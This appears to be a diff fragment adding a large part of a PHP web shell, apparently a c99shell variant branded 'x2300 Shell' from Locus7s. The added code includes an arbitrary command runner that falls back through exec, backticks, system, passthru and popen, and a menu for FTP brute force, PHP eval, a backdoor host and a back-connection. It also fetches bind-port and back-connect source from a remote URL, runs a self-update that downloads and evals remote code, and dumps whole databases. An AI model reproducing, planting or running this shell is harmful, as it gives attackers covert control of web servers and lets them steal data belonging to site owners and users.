+  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), 
+  array("list file attributes on a Linux second extended file system", "lsattr -va"), 
+  array("show opened ports", "netstat -an | grep -i listen") 
+ ); 
+} 
+else 
+{ 
+ $cmdaliases = array( 
+  array("-----------------------------------------------------------", "dir"), 
+  array("show opened ports", "netstat -an") 
+ ); 
+} 
+
+$sess_cookie = "c99shvars"; // Cookie-variable name 
+
+$usefsbuff = TRUE; //Buffer-function 
+$copy_unset = FALSE; //Remove copied files from buffer after pasting 
+
+//Quick launch 
+$quicklaunch = array( 
+ array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl), 
+ array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"), 
+ array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"), 
+ array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"), 
+ array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""), 
+ array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"), 
+ array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"), 
+ array("<br><center><b>[Enumerate]</b>",$enumerate),
+ array("<b>[Encoder]</b>",$surl."act=encoder&d=%d"), 
+ array("<b>[Tools]</b>",$surl."act=tools&d=%d"), 
+ array("<b>[Proc.]</b>",$surl."act=processes&d=%d"), 
+ array("<b>[FTP Brute]</b>",$surl."act=ftpquickbrute&d=%d"), 
+ array("<b>[Sec.]</b>",$surl."act=security&d=%d"), 
+ array("<b>[SQL]</b>",$surl."act=sql&d=%d"), 
+ array("<b>[PHP-Code]</b>",$surl."act=eval&d=%d"), 
+ array("<b>[Backdoor Host]</b>",$surl."act=shbd"),
+ array("<b>[Back-Connection]</b>",$surl."act=backc"), 
+ array("<b>[milw0rm it!]</b>",$millink),
+ array("<b>[PHP-Proxy]</b>",$phprox),
+ array("<b>[Self remove]</b></center>",$surl."act=selfremove")
+); 
+
+//Highlight-code colors 
+$highlight_background = "#c0c0c0"; 
+$highlight_bg = "#FFFFFF"; 
+$highlight_comment = "#6A6A6A"; 
+$highlight_default = "#0000BB"; 
+$highlight_html = "#1300FF"; 
+$highlight_keyword = "#007700"; 
+$highlight_string = "#000000"; 
+
+@$f = $_REQUEST["f"]; 
+@extract($_REQUEST["c99shcook"]); 
+
+//END CONFIGURATION 
+
+
+// \/Next code isn't for editing\/ 
+/*function ex($cfe) 
+{ 
+ $res = ''; 
+ if (!empty($cfe)) 
+ { 
+  if(function_exists('exec')) 
+   { 
+    @exec($cfe,$res); 
+    $res = join("\n",$res); 
+   } 
+  elseif(function_exists('shell_exec')) 
+   { 
+    $res = @shell_exec($cfe); 
+   } 
+  elseif(function_exists('system')) 
+   { 
+    @ob_start(); 
+    @system($cfe); 
+    $res = @ob_get_contents(); 
+    @ob_end_clean(); 
+   } 
+  elseif(function_exists('passthru')) 
+   { 
+    @ob_start(); 
+    @passthru($cfe); 
+    $res = @ob_get_contents(); 
+    @ob_end_clean(); 
+   } 
+  elseif(@is_resource($f = @popen($cfe,"r"))) 
+  { 
+   $res = ""; 
+   while(!@feof($f)) { $res .= @fread($f,1024); } 
+   @pclose($f); 
+  } 
+ } 
+ return $res; 
+}*/
+/*function which($pr) 
+{ 
+$path = ex("which $pr"); 
+if(!empty($path)) { return $path; } else { return $pr; } 
+} 
+
+function cf($fname,$text) 
+{ 
+ $w_file=@fopen($fname,"w") or err(0); 
+ if($w_file) 
+ { 
+ @fputs($w_file,@base64_decode($text)); 
+ @fclose($w_file); 
+ } 
+}*/ 
+/*function err($n,$txt='') 
+{ 
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=Verdana size=-2><div align=center><b>';     
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; 
+if(!empty($txt)) { echo " $txt"; } 
+echo '</b></div></font></td></tr></table>'; 
+return null; 
+}*/
+@set_time_limit(0); 
+$tmp = array(); 
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} 
+$s = "!^(".implode("|",$tmp).")$!i"; 
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://locus7s.com/\">x2300 Shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} 
+if (!empty($login)) 
+{ 
+ if (empty($md5_pass)) {$md5_pass = md5($pass);} 
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) 
+ { 
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));} 
+  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); 
+  header("HTTP/1.0 401 Unauthorized"); 
+  exit($accessdeniedmess); 
+ } 
+} 
+if ($act != "img") 
+{ 
+$lastdir = realpath("."); 
+chdir($curdir); 
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} 
+$sess_data = unserialize($_COOKIE["$sess_cookie"]); 
+if (!is_array($sess_data)) {$sess_data = array();} 
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} 
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} 
+
+$disablefunc = @ini_get("disable_functions"); 
+if (!empty($disablefunc)) 
+{ 
+ $disablefunc = str_replace(" ","",$disablefunc); 
+ $disablefunc = explode(",",$disablefunc); 
+} 
+
+if (!function_exists("c99_buff_prepare")) 
+{ 
+function c99_buff_prepare() 
+{ 
+ global $sess_data; 
+ global $act; 
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
+ $sess_data["copy"] = array_unique($sess_data["copy"]); 
+ $sess_data["cut"] = array_unique($sess_data["cut"]); 
+ sort($sess_data["copy"]); 
+ sort($sess_data["cut"]); 
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} 
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} 
+} 
+} 
+c99_buff_prepare(); 
+
+if (!function_exists("c99_sess_put")) 
+{ 
+function c99_sess_put($data) 
+{ 
+ global $sess_cookie; 
+ global $sess_data; 
+ c99_buff_prepare(); 
+ $sess_data = $data; 
+ $data = serialize($data); 
+ setcookie($sess_cookie,$data); 
+} 
+} 
+foreach (array("sort","sql_sort") as $v) 
+{ 
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];} 
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];} 
+} 
+if ($sort_save) 
+{ 
+ if (!empty($sort)) {setcookie("sort",$sort);} 
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} 
+} 
+if (!function_exists("str2mini")) 
+{ 
+function str2mini($content,$len) 
+{ 
+ if (strlen($content) > $len) 
+ { 
+  $len = ceil($len/2) - 2; 
+  return substr($content, 0,$len)."...".substr($content,-$len); 
+ } 
+ else {return $content;} 
+} 
+} 
+if (!function_exists("view_size")) 
+{ 
+function view_size($size) 
+{ 
+ if (!is_numeric($size)) {return FALSE;} 
+ else 
+ { 
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
+  else {$size = $size . " B";} 
+  return $size; 
+ } 
+} 
+} 
+if (!function_exists("fs_copy_dir")) 
+{ 
+function fs_copy_dir($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+ $h = opendir($d); 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   if (!$ret) {return $ret;} 
+  } 
+ } 
+ closedir($h); 
+ return TRUE; 
+} 
+} 
+if (!function_exists("fs_copy_obj")) 
+{ 
+function fs_copy_obj($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); 
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));} 
+ if (is_dir($d)) 
+ { 
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} 
+  return fs_copy_dir($d,$t); 
+ } 
+ elseif (is_file($d)) {return copy($d,$t);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("fs_move_dir")) 
+{ 
+function fs_move_dir($d,$t) 
+{ 
+ $h = opendir($d); 
+ if (!is_dir($t)) {mkdir($t);} 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   $ret = TRUE; 
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} 
+   if (!$ret) {return $ret;} 
+  } 
+ } 
+ closedir($h); 
+ return TRUE; 
+} 
+} 
+if (!function_exists("fs_move_obj")) 
+{ 
+function fs_move_obj($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); 
+ if (is_dir($d)) 
+ { 
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} 
+  return fs_move_dir($d,$t); 
+ } 
+ elseif (is_file($d)) 
+ { 
+  if(copy($d,$t)) {return unlink($d);} 
+  else {unlink($t); return FALSE;} 
+ } 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("fs_rmdir")) 
+{ 
+function fs_rmdir($d) 
+{ 
+ $h = opendir($d); 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   if (!is_dir($d.$o)) {unlink($d.$o);} 
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} 
+  } 
+ } 
+ closedir($h); 
+ rmdir($d); 
+ return !is_dir($d); 
+} 
+} 
+if (!function_exists("fs_rmobj")) 
+{ 
+function fs_rmobj($o) 
+{ 
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); 
+ if (is_dir($o)) 
+ { 
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} 
+  return fs_rmdir($o); 
+ } 
+ elseif (is_file($o)) {return unlink($o);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("myshellexec")) 
+{ 
+function myshellexec($cmd) 
+{ 
+ global $disablefunc; 
+ $result = ""; 
+ if (!empty($cmd)) 
+ { 
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} 
+  elseif (($result = `$cmd`) !== FALSE) {} 
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} 
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} 
+  elseif (is_resource($fp = popen($cmd,"r"))) 
+  { 
+   $result = ""; 
+   while(!feof($fp)) {$result .= fread($fp,1024);} 
+   pclose($fp); 
+  } 
+ } 
+ return $result; 
+} 
+} 
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} 
+if (!function_exists("view_perms")) 
+{ 
+function view_perms($mode) 
+{ 
+ if (($mode & 0xC000) === 0xC000) {$type = "s";} 
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";} 
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";} 
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";} 
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";} 
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";} 
+ else {$type = "?";} 
+
+ $owner["read"] = ($mode & 00400)?"r":"-"; 
+ $owner["write"] = ($mode & 00200)?"w":"-"; 
+ $owner["execute"] = ($mode & 00100)?"x":"-"; 
+ $group["read"] = ($mode & 00040)?"r":"-"; 
+ $group["write"] = ($mode & 00020)?"w":"-"; 
+ $group["execute"] = ($mode & 00010)?"x":"-"; 
+ $world["read"] = ($mode & 00004)?"r":"-"; 
+ $world["write"] = ($mode & 00002)? "w":"-"; 
+ $world["execute"] = ($mode & 00001)?"x":"-"; 
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} 
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} 
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} 
+
+ return $type.join("",$owner).join("",$group).join("",$world); 
+} 
+} 
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} 
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} 
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} 
+if (!function_exists("parse_perms")) 
+{ 
+function parse_perms($mode) 
+{ 
+ if (($mode & 0xC000) === 0xC000) {$t = "s";} 
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";} 
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";} 
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";} 
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";} 
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";} 
+ else {$t = "?";} 
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; 
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; 
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; 
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); 
+} 
+} 
+if (!function_exists("parsesort")) 
+{ 
+function parsesort($sort) 
+{ 
+ $one = intval($sort); 
+ $second = substr($sort,-1); 
+ if ($second != "d") {$second = "a";} 
+ return array($one,$second); 
+} 
+} 
+if (!function_exists("view_perms_color")) 
+{ 
+function view_perms_color($o) 
+{ 
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} 
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} 
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";} 
+} 
+} 
+if (!function_exists("c99getsource")) 
+{ 
+function c99getsource($fn) 
+{ 
+ global $c99sh_sourcesurl; 
+ $array = array( 
+  "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", 
+  "c99sh_bindport.c" => "c99sh_bindport_c.txt", 
+  "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", 
+  "c99sh_backconn.c" => "c99sh_backconn_c.txt", 
+  "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", 
+  "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", 
+ ); 
+ $name = $array[$fn]; 
+ if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("c99sh_getupdate")) 
+{ 
+function c99sh_getupdate($update = TRUE) 
+{ 
+ $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; 
+ $data = @file_get_contents($url); 
+ if (!$data) {return "Can't connect to update-server!";} 
+ else 
+ { 
+  $data = ltrim($data); 
+  $string = substr($data,3,ord($data{2})); 
+  if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} 
+  if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} 
+  if ($data{0} == "\x99" and $data{1} == "\x03") 
+  { 
+   $string = explode("\x01",$string); 
+   if ($update) 
+   { 
+    $confvars = array(); 
+    $sourceurl = $string[0]; 
+    $source = file_get_contents($sourceurl); 
+    if (!$source) {return "Can't fetch update!";} 
+    else 
+    { 
+     $fp = fopen(__FILE__,"w"); 
+     if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";} 
+     else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} 
+    } 
+   } 
+   else {return "New version are available: ".$string[1];} 
+  } 
+  elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} 
+  else {return "Error in protocol: segmentation failed! (".$data.") ";} 
+ } 
+} 
+} 
+if (!function_exists("mysql_dump")) 
+{ 
+function mysql_dump($set) 
+{ 
+ global $shver; 
+ $sock = $set["sock"]; 
+ $db = $set["db"]; 
+ $print = $set["print"]; 
+ $nl2br = $set["nl2br"]; 
+ $file = $set["file"]; 
+ $add_drop = $set["add_drop"]; 
+ $tabs = $set["tabs"]; 
+ $onlytabs = $set["onlytabs"]; 
+ $ret = array(); 
+ $ret["err"] = array(); 
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} 
+ if (empty($db)) {$db = "db";} 
+ if (empty($print)) {$print = 0;} 
+ if (empty($nl2br)) {$nl2br = 0;} 
+ if (empty($add_drop)) {$add_drop = TRUE;} 
+ if (empty($file)) 
+ { 
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; 
+ } 
+ if (!is_array($tabs)) {$tabs = array();} 
+ if (empty($add_drop)) {$add_drop = TRUE;} 
+ if (sizeof($tabs) == 0) 
+ { 
+  // retrive tables-list 
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock); 
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} 
+ } 
+ $out = "# Dumped by Locous7Shell.SQL v. ".$shver." 
+# Home page: http://www.Locus7s.com 
+# 
+# Host settings: 
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." 
+# Date: ".date("d.m.Y H:i:s")." 
+# DB: \"".$db."\" 
+#--------------------------------------------------------- 
+"; 
+ $c = count($onlytabs); 
+ foreach($tabs as $tab) 
+ { 
+  if ((in_array($tab,$onlytabs)) or (!$c)) 
+  { 
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} 
+   // recieve query for create table structure 
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); 
+   if (!$res) {$ret["err"][] = mysql_smarterror();} 
+   else 
+   { 
+    $row = mysql_fetch_row($res); 
+    $out .= $row["1"].";\n\n"; 
+    // recieve table variables 
+    $res = mysql_query("SELECT * FROM `$tab`", $sock); 
+    if (mysql_num_rows($res) > 0) 
+    { 
+     while ($row = mysql_fetch_assoc($res)) 
+     { 
+      $keys = implode("`, `", array_keys($row)); 
+      $values = array_values($row); 
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+      $values = implode("', '", $values); 
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+      $out .= $sql; 
+     } 
+    } 
+   } 
+  } 
+ } 
+ $out .= "#---------------------------------------------------------------------------------\n\n"; 
+ if ($file) 
+ { 
+  $fp = fopen($file, "w"); 
+  if (!$fp) {$ret["err"][] = 2;} 
+  else 
+  { 
+   fwrite ($fp, $out); 
+   fclose ($fp); 
+  } 
+ } 
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} 
+ return $out; 
+} 
+} 
+if (!function_exists("mysql_buildwhere")) 
+{ 
+function mysql_buildwhere($array,$sep=" and",$functs=array()) 
+{ 
+ if (!is_array($array)) {$array = array();} 
+ $result = ""; 
+ foreach($array as $k=>$v) 
+ { 
+  $value = ""; 
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";} 
+  $value .= "'".addslashes($v)."'"; 
+  if (!empty($functs[$k])) {$value .= ")";} 
+  $result .= "`".$k."` = ".$value.$sep; 
+ } 
+ $result = substr($result,0,strlen($result)-strlen($sep)); 
+ return $result; 
+} 
+} 
+if (!function_exists("mysql_fetch_all")) 
+{ 
+function mysql_fetch_all($query,$sock) 
+{ 
+ if ($sock) {$result = mysql_query($query,$sock);} 
+ else {$result = mysql_query($query);} 
+ $array = array(); 
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;} 
+ mysql_free_result($result); 
+ return $array; 
+} 
+} 
+if (!function_exists("mysql_smarterror")) 
+{ 
+function mysql_smarterror($type,$sock) 
+{ 
+ if ($sock) {$error = mysql_error($sock);} 
+ else {$error = mysql_error();} 
+ $error = htmlspecialchars($error); 
+ return $error; 
+} 
+} 
+if (!function_exists("mysql_query_form")) 
+{ 
+function mysql_query_form() 
+{ 
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; 
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} 
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} 
+ if ((!$submit) or ($sql_act)) 
+ { 
+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>"; 
+  if ($tbl_struct) 
+  { 
+   echo "<td valign=\"top\"><b>Fields:</b><br>"; 
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} 
+   echo "</td></tr></table>"; 
+  } 
+ } 
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} 
+} 
+} 
+if (!function_exists("mysql_create_db")) 
+{ 
+function mysql_create_db($db,$sock="") 
+{ 
+ $sql = "CREATE DATABASE `".addslashes($db)."`;"; 
+ if ($sock) {return mysql_query($sql,$sock);} 
+ else {return mysql_query($sql);} 
+} 
+} 
+if (!function_exists("mysql_query_parse")) 
+{ 
+function mysql_query_parse($query) 
+{ 
+ $query = trim($query); 
+ $arr = explode (" ",$query); 
+ /*array array() 
+ { 
+  "METHOD"=>array(output_type), 
+  "METHOD1"... 
+  ... 
+ } 
+ if output_type == 0, no output, 
+ if output_type == 1, no output if no error 
+ if output_type == 2, output without control-buttons 
+ if output_type == 3, output with control-buttons 
+ */ 
+ $types = array( 
+  "SELECT"=>array(3,1), 
+  "SHOW"=>array(2,1), 
+  "DELETE"=>array(1), 
+  "DROP"=>array(1) 
+ ); 
+ $result = array(); 
+ $op = strtoupper($arr[0]); 
+ if (is_array($types[$op])) 
+ { 
+  $result["propertions"] = $types[$op]; 
+  $result["query"]  = $query; 
+  if ($types[$op] == 2) 
+  { 
+   foreach($arr as $k=>$v) 
+   { 
+    if (strtoupper($v) == "LIMIT") 
+    { 
+     $result["limit"] = $arr[$k+1]; 
+     $result["limit"] = explode(",",$result["limit"]); 
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} 
+     unset($arr[$k],$arr[$k+1]); 
+    } 
+   } 
+  } 
+ } 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("c99fsearch")) 
+{ 
+function c99fsearch($d) 
+{ 
+ global $found; 
+ global $found_d; 
+ global $found_f; 
+ global $search_i_f; 
+ global $search_i_d; 
+ global $a; 
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+ $h = opendir($d); 
+ while (($f = readdir($h)) !== FALSE) 
+ { 
+  if($f != "." && $f != "..") 
+  { 
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); 
+   if (is_dir($d.$f)) 
+   { 
+    $search_i_d++; 
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} 
+    if (!is_link($d.$f)) {c99fsearch($d.$f);} 
+   } 
+   else 
+   { 
+    $search_i_f++; 
+    if ($bool) 
+    { 
+     if (!empty($a["text"])) 
+     { 
+      $r = @file_get_contents($d.$f); 
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} 
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} 
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} 
+      else {$bool = strpos(" ".$r,$a["text"],1);} 
+      if ($a["text_not"]) {$bool = !$bool;} 
+      if ($bool) {$found[] = $d.$f; $found_f++;} 
+     } 
+     else {$found[] = $d.$f; $found_f++;} 
+    } 
+   } 
+  } 
+ } 
+ closedir($h); 
+} 
+} 
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} 
+//Sending headers 
+@ob_start(); 
+@ob_implicit_flush(0); 
+function onphpshutdown() 
+{ 
+ global $gzipencode,$ft; 
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) 
+ { 
+  $v = @ob_get_contents(); 
+  @ob_end_clean(); 
+  @ob_start("ob_gzHandler"); 
+  echo $v; 
+  @ob_end_flush(); 
+ } 
+} 
+function c99shexit() 
+{ 
+ onphpshutdown(); 
+ exit; 
+} 
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); 
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); 
+header("Cache-Control: no-store, no-cache, must-revalidate"); 
+header("Cache-Control: post-check=0, pre-check=0", FALSE); 
+header("Pragma: no-cache"); 
+if (empty($tmpdir)) 
+{ 
+ $tmpdir = ini_get("upload_tmp_dir"); 
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} 
+} 
+$tmpdir = realpath($tmpdir); 
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); 
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} 
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} 
+else {$tmpdir_logs = realpath($tmpdir_logs);} 
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") 
+{ 
+ $safemode = TRUE; 
+ $hsafemode = "<font color=red>ON (secure)</font>"; 
+} 
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";} 
+$v = @ini_get("open_basedir"); 
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";} 
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} 
+$sort = htmlspecialchars($sort); 
+if (empty($sort)) {$sort = $sort_default;} 
+$sort[1] = strtolower($sort[1]); 
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); 
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} 
